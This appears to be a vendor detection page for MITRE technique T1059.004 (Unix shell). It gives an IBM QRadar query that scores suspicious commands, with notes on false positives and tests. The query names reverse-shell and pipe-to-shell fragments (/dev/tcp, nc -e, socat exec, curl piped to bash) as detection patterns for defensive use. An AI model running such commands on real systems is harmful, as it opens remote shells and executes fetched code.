T1059.004 IBM QRadar · QRadar

Detect Unix Shell in IBM QRadar

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations exist (sh, ash, bash, zsh, etc.). Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Adversaries may abuse Unix shells to execute various commands or payloads, access interactive shells through C2 channels, leverage shell scripts for persistence, or use stripped-down shells via Busybox on embedded devices and ESXi servers.

MITRE ATT&CK

Tactic
Execution
Technique
T1059 Command and Scripting Interpreter
Sub-technique
T1059.004 Unix Shell
Canonical reference
https://attack.mitre.org/techniques/T1059/004/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  LOGSOURCENAME(logsourceid) AS log_source,
  CATEGORYNAME(category) AS category_name,
  "Process Name",
  "Command",
  CASE
    WHEN "Command" ILIKE '%/dev/tcp/%' OR "Command" ILIKE '%nc -e /bin/%' OR "Command" ILIKE '%ncat -e%' OR "Command" ILIKE '%socat exec:%' THEN 3
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%curl%|%bash%' OR "Command" ILIKE '%curl%|%sh%' OR "Command" ILIKE '%wget%|%bash%' OR "Command" ILIKE '%wget%|%sh%' THEN 2
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%base64 -d%' OR "Command" ILIKE '%base64 --decode%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%chmod +s%' OR "Command" ILIKE '%chmod 4755%' OR "Command" ILIKE '%useradd%' OR "Command" ILIKE '%usermod -aG%' THEN 2
    ELSE 0
  END AS suspicion_score
FROM events
WHERE
  starttime > NOW() - 1 DAYS
  AND LOGSOURCETYPEID IN (13, 14, 105, 191)
  AND ("Process Name" ILIKE '%bash%' OR "Process Name" ILIKE '%/bin/sh%' OR "Process Name" ILIKE '%zsh%' OR "Process Name" ILIKE '%dash%' OR "Process Name" ILIKE '%busybox%')
  AND (
    "Command" ILIKE '%/dev/tcp/%' OR
    "Command" ILIKE '%/dev/udp/%' OR
    "Command" ILIKE '%nc -e /bin/%' OR
    "Command" ILIKE '%ncat -e%' OR
    "Command" ILIKE '%socat exec:%' OR
    "Command" ILIKE '%curl%|%bash%' OR
    "Command" ILIKE '%wget%|%bash%' OR
    "Command" ILIKE '%base64 -d%' OR
    "Command" ILIKE '%base64 --decode%' OR
    "Command" ILIKE '%mkfifo /tmp/%' OR
    "Command" ILIKE '%chmod +s%' OR
    "Command" ILIKE '%chmod 4755%' OR
    "Command" ILIKE '%useradd%' OR
    "Command" ILIKE '%usermod -aG%' OR
    "Command" ILIKE '%iptables -F%' OR
    "Command" ILIKE '%python%import socket%' OR
    "Command" ILIKE '%perl -e%use Socket%'
  )
HAVING suspicion_score > 0
ORDER BY suspicion_score DESC, starttime DESC
high severity medium confidence

Detects suspicious Unix shell commands across Linux syslog and auditd log sources. Applies a weighted suspicion score (reverse shell=3, pipe-to-shell=2, privilege escalation=2, base64=1) and surfaces events with any non-zero score. Covers /dev/tcp reverse shells, netcat/socat, curl/wget pipe execution, base64 payload decoding, SUID manipulation, and firewall flush.

Data Sources

Linux OS (syslog)Linux auditd (LOGSOURCETYPEID 105)Unix Authentication (LOGSOURCETYPEID 13)Syslog (LOGSOURCETYPEID 14)

Required Tables

events

False Positives & Tuning

  • Legitimate bootstrap scripts in CI/CD environments that use curl | bash to install build agents or language runtimes
  • Security teams running authorized red team exercises that deliberately trigger these patterns as part of purple team testing
  • System hardening scripts that flush and rebuild iptables rules during scheduled maintenance windows
Download portable Sigma rule (.yml)

Other platforms for T1059.004

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Bash Reverse Shell via /dev/tcp

    Expected signal: Auditd: EXECVE record for bash with /dev/tcp in arguments. Syslog: bash process creation. Network connection attempt to 127.0.0.1:4444 (will fail without listener). MDE DeviceProcessEvents on managed Linux endpoints.

  2. Test 2Curl Pipe to Bash

    Expected signal: Auditd: EXECVE records for curl and bash. Process tree shows curl piped to bash. Network connection attempt to 127.0.0.1:8080 (will fail without listener). The curl failure means no content reaches bash.

  3. Test 3Base64 Encoded Command Execution

    Expected signal: Auditd: EXECVE records for echo, base64, and bash. The decoded content 'whoami' will be executed. Syslog captures the process chain.

Last updated: 2026-04-17 Research depth: deep
References (6)

Unlock Pro Content

Get the full detection package for T1059.004 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1059Command and Scripting Interpreter

Related Sub-techniques

T1059.001PowerShellT1059.002AppleScriptT1059.003Windows Command ShellT1059.005Visual BasicT1059.006PythonT1059.007JavaScriptT1059.008Network Device CLIT1059.009Cloud APIT1059.010AutoHotKey & AutoITT1059.011LuaT1059.012Hypervisor CLIT1059.013Container CLI/API

Related Techniques

T1059Command and Scripting InterpreterT1059.006PythonT1021.004SSHT1053.003CronT1105Ingress Tool TransferT1548.001Setuid and SetgidT1136.001Local AccountT1505.003Web Shell

Same Tactic: Execution

Popular Detections